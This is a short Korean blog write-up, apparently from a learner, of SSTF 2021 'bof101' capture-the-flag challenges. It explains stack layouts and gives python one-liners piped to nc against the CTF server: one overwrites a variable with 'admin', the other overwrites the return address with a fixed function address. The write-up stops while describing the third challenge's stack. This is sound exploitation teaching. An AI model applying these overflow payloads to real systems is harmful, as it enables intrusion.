-
[sstf2021] bof101hacking 2021. 8. 20. 21:44
bof101(quiz1) scanf("%s", name);
에서 bof가 발생하고 level 의값을 "admin"으로 변조시키면 된다
스택 구조
level[16] + name[16] + rbp[8] + ret 와 같다
이 문제는 name 값만 변조시키면 됨으로
A*16 + admin 와 같이 입력하면 name의 값이 변조된다
python -c 'print "A" * 16 + "admin"' | nc bof101.sstf.site 1335
bof101(quiz2) 스택 구조
name[16] + rbp[8] + ret
ret를 secret 함수의 주소값으로 변조시키면 된다
ASLR이 꺼져 있음으로 주소값은 고정되어 있고 main 함수에서 그 주소값을 알려준다
python -c 'print "A" * (16 + 8) + "\x7a\x47\x55\x55\x55\x55"' | nc bof101.sstf.site 1336
위 두 문제는 bof101을 위한 개념 문제정도라고 보면 된다
bof101을 풀어보자
bof101.c name의 값을 받는 부분에서 bof가 발생한다
printflag()를 실행시키면 되는데, check의 값을 고려해줘야 ret를 변조시킬 수 있을 듯 싶다
스택은 다음과 같다
name[140] + check[4] + rsp[8] + ret
'hacking' 카테고리의 다른 글
[sstf2021] sqli102 (0) 2021.08.23 [sstf2021] sqli101 (0) 2021.08.22 [sstf2021] bof102 (0) 2021.08.21 [LOB] gremlin (0) 2021.08.19 [LOB] gate (0) 2021.08.18